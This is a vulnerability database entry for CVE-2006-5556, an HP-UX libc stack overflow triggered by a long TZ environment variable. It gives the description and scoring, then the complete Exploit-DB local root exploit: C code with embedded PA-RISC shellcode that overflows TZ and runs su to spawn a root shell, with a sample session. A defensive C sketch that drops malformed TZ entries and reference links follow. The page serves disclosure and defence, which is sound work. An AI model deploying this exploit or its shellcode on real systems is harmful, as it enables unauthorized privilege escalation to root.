CVE-2006-5556 : Detail

0.27%V3
Local
2006-10-27
14h00 +00:00
2017-10-18
14h57 +00:00

CVE Descriptions

Buffer overflow in the localtime_r function, and certain other functions, in libc in HP-UX B.11.11 and possibly other versions allows local users to execute arbitrary code via a long TZ environment variable.

CVE Information

Metrics

Metrics Score Severity CVSS Vector Source
V2 4.6 AV:L/AC:L/Au:N/C:P/I:P/A:P [email protected]

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile ranks CVEs according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVEs. The percentile is therefore used to compare the EPSS score of one CVE with that of other CVEs.

Exploit information

Exploit Database EDB-ID : 2636

Publication date : 2006-10-23 22h00 +00:00
Author : prdelka
EDB Verified : Yes

/* HP-UX libc timezone environment overflow exploit
 * ================================================
 * HP-UX libc contains an exploitable stack overflow
 * in the handling of "TZ" environment variable. The
 * problem occurs due to insufficient bounds checking
 * in the localtime_r() and related functions. Any suid
 * or sgid program which uses the timezone functions can
 * be used as an attack vector. This exploit uses "su"
 * to obtain root priviledges.
 *
 * Example.
 * $ cc prdelka-vs-HPUX-libc.c -o prdelka-vs-HPUX-libc
 * /usr/ccs/bin/ld: (Warning) At least one PA 2.0 object file
 * (prdelka-vs-HPUX-libc.o) was detected. The linked output may not run
 * on a PA 1.x system.
 * $ uname -a
 * HP-UX hpux B.11.11 U 9000/785 2012383315 unlimited-user license
 * $ id
 * uid=102(user) gid=20(users)
 * $ ./prdelka-vs-HPUX-libc
 * [ HP-UX libc timezone environment overflow
 * Password:
 * # id
 * uid=102(user) gid=20(users) euid=0(root)
 *
 * - prdelka
 */

char shellcode[]="\xeb\x5f\x1f\xfd\x0b\x39\x02\x99\xb7\x5a\x40\x22"
                 "\x0f\x40\x12\x0e\x20\x20\x08\x01\xe4\x20\xe0\x08"
                 "\xb4\x16\x70\x16""/bin/sh";

int main(){
    char *a, adr[4],ptr1[4],ptr2[4],*b,*envp[3];
    int i;
    *(unsigned long*)adr=0x10eC7f7F;
    *(unsigned long*)ptr1=0x059c7f7f;
    *(unsigned long*)ptr2=0x7f7f059c;
    b=(char*)malloc(126);
    memset(b,0,126);
    a=b;
    sprintf(b,"PATH=");
    b+=5;
    for(i=0;i<120;i++) *b++=ptr1[i%4];
    envp[0]=a;
    b=(char*)malloc(809);
    memset(b,0,809);
    a=b;
    sprintf(b,"MANPATH=");
    b+=8;
    for(i=0;i<800;i++) *b++=ptr1[i%4];
    envp[1]=a;
    b=(char*)malloc(3429);
    memset(b,0,3427);
    a=b;
    sprintf(b,"TZ=");
    b+=3;
    for(i=0;i<2384;i++) *b++=ptr1[i%4];
    for(i=0;i<4;i++) *b++=ptr2[i%4];
    for(i=0;i<1002;i++) *b++=adr[i%4];
    for(i=0;i<strlen(shellcode);i++) *b++=shellcode[i];
    envp[2]=a;
    envp[3]=0;
    printf("[ HP-UX libc timezone environment overflow\n");
    execle("/usr/bin/su","pdk",0,envp);
}

// milw0rm.com [2006-10-24]
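A hardening sketch for the condition described above, added here and not part of the CVE record, the Exploit Database entry or any vendor code: a set-uid or set-gid program can drop an over-long or malformed TZ entry from its environment before any libc time function reads it. The names `tz_value_ok` and `scrub_tz`, the 64-byte bound and the allowed character set are assumptions of this example.

```c
#include <ctype.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Assumed policy for this example: real TZ values are short ASCII strings. */
#define TZ_MAX_LEN 64

/* Return 1 if a TZ value is within the length bound and uses only characters
 * found in POSIX TZ rules and zoneinfo names; return 0 otherwise. */
int tz_value_ok(const char *tz)
{
    for (size_t n = 0; tz[n] != '\0'; n++) {
        unsigned char c = (unsigned char)tz[n];
        if (n >= TZ_MAX_LEN)
            return 0;                      /* longer than the bound */
        if (!isalnum(c) && strchr("/_+-:,.<>", c) == NULL)
            return 0;                      /* binary or unexpected byte */
    }
    return strstr(tz, "..") == NULL;       /* no path traversal */
}

/* Drop every "TZ=" entry that fails the check from a NULL-terminated
 * environment vector, compacting it in place. Returns the number dropped. */
size_t scrub_tz(char **envp)
{
    size_t dropped = 0;
    char **out = envp;
    for (char **in = envp; *in != NULL; in++) {
        if (strncmp(*in, "TZ=", 3) == 0 && !tz_value_ok(*in + 3)) {
            dropped++;
            continue;
        }
        *out++ = *in;
    }
    *out = NULL;
    return dropped;
}

int main(void)
{
    /* Constructed sample environment: one oversized TZ, one normal entry. */
    static char big[3 + 3000 + 1] = "TZ=";
    char path[] = "PATH=/usr/bin";
    memset(big + 3, 'A', 3000);
    char *env[] = { path, big, NULL };
    printf("dropped %zu TZ entr(y/ies)\n", scrub_tz(env));
    return 0;
}
```

In a privileged program the call would be made on the process environment at the top of `main()`, before the first `localtime_r()` or related call; it limits what reaches libc from that program and does not change libc itself.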

Products Mentioned

Configuration 0

Hp>>Hp-ux >> Version 11.00

Hp>>Hp-ux >> Version 11.4

Hp>>Hp-ux >> Version 11.11

References

https://www.exploit-db.com/exploits/2636
Tags : exploit, x_refsource_EXPLOIT-DB
http://www.securityfocus.com/bid/20718
Tags : vdb-entry, x_refsource_BID